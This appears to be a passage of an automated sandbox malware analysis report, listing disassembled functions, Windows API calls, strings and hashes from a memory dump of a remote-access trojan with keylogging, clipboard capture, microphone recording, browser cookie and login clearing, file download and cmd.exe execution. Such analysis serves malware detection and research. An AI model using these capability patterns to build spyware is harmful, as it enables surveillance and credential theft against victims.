                                                      • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID: /C $cmd.exe$open
                                                      • API String ID: 587946157-3896048727
                                                      • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                      • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                      • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                                      • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: GetCursorInfo$User32.dll
                                                      • API String ID: 1646373207-2714051624
                                                      • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                      • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                      • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                      • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetLastInputInfo$User32.dll
                                                      • API String ID: 2574300362-1519888992
                                                      • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                      • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                      • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                      • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                      • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                      • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                      • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                      APIs
                                                      Strings
                                                      • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                      • Cleared browsers logins and cookies., xrefs: 0040C130
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                      • API String ID: 3472027048-1236744412
                                                      • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                      • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                      • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                                      • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                      APIs
                                                        • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                        • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                        • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                      • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                      • Sleep.KERNEL32(00000064), ref: 0040A638
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$SleepText$ForegroundLength
                                                      • String ID: [ $ ]
                                                      • API String ID: 3309952895-93608704
                                                      • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                      • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                      • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                                      • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                      • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                      • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                      • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                      • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                      • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                      • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 3919263394-0
                                                      • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                      • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                      • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                                      • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                      APIs
                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleOpenProcess
                                                      • String ID:
                                                      • API String ID: 39102293-0
                                                      • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                      • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                      • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                                      • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                        • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                      • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                      • String ID:
                                                      • API String ID: 2633735394-0
                                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                      • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                      • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                      APIs
                                                      • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                      • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                      • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                      • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem
                                                      • String ID:
                                                      • API String ID: 4116985748-0
                                                      • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                      • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                      • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                      • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                      APIs
                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                        • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                      • String ID:
                                                      • API String ID: 1761009282-0
                                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                      • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                      • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                      • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                      • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                      • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                                      • GetLastError.KERNEL32 ref: 00449FAB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide
                                                      • String ID: PkGNG
                                                      • API String ID: 203985260-263838557
                                                      • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                      • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                                      • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                                      • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                                      APIs
                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                      • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Init_thread_footer__onexit
                                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                                      • API String ID: 1881088180-3686566968
                                                      • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                      • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                      • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                                      • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                      • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                      • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                      • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                      APIs
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                                      • GetLastError.KERNEL32 ref: 0044B884
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: PkGNG
                                                      • API String ID: 442123175-263838557
                                                      • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                      • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                      • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                                      • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                      APIs
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                                      • GetLastError.KERNEL32 ref: 0044B796
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: PkGNG
                                                      • API String ID: 442123175-263838557
                                                      • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                      • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                      • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                                      • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 481472006-1507639952
                                                      • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                      • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                      • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                      • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                      APIs
                                                      • Sleep.KERNEL32 ref: 0041667B
                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DownloadFileSleep
                                                      • String ID: !D@
                                                      • API String ID: 1931167962-604454484
                                                      • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                      • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                      • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                      • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                      APIs
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExistsFilePath
                                                      • String ID: alarm.wav$hYG
                                                      • API String ID: 1174141254-2782910960
                                                      • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                      • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                      • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                      • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                      APIs
                                                        • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                        • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                      • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                      • String ID: Online Keylogger Stopped
                                                      • API String ID: 1623830855-1496645233
                                                      • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                      • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                      • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                      • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: LCMapStringEx$PkGNG
                                                      • API String ID: 2568140703-1065776982
                                                      • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                                      • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                      • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                                      • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                      APIs
                                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferHeaderPrepare
                                                      • String ID: XMG
                                                      • API String ID: 2315374483-813777761
                                                      • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                      • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                      • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                      • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                      APIs
                                                      • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LocaleValid
                                                      • String ID: IsValidLocaleName$kKD
                                                      • API String ID: 1901932003-3269126172
                                                      • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                      • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                      • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
